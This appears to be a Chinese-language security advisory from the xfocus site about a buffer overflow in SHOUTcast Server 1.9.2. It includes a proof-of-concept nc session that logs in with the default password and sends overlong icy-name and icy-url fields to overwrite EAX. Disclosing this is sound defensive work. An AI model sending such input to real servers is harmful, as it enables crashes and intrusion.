xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Nullsoft SHOUTcast icy-name/icy-url内存破坏漏洞


发布时间:2003-11-03
更新时间:2003-11-03
严重程度:
威胁程度:普通用户访问权限
错误类型:环境错误
利用方式:服务器模式

BUGTRAQ ID:8954

受影响系统
NullSoft Shoutcast Server 1.9.2 Win32
详细描述
lsoft SHOUTcast Server由于对授权用户提供的命令缺少充分边界检查,登录后提交超长字符串的icy-name(Server Desc)和icy-url(Stream URL)命令,可导致触发溢出.

测试代码
>nc target 8001
changeme
icy-name:AAA...[Ax275]BBBB[rewrite EAX]
icy-genre:DoS radio
icy-url:AAA...[Ax288]BBBB[rewrite EAX]
icy-pub:1
icy-irc:N/A
icy-icq:N/A
icy-aim:N/A
icy-br:160

...
stream audio data
...

P.S. Default password "changeme" !!!

相关信息
HEX <hex@hex_net_ru.securityfocus.com>.
参考:http://www.securityfocus.com/archive/1/343177
相关主页:http://www.shoutcast.com/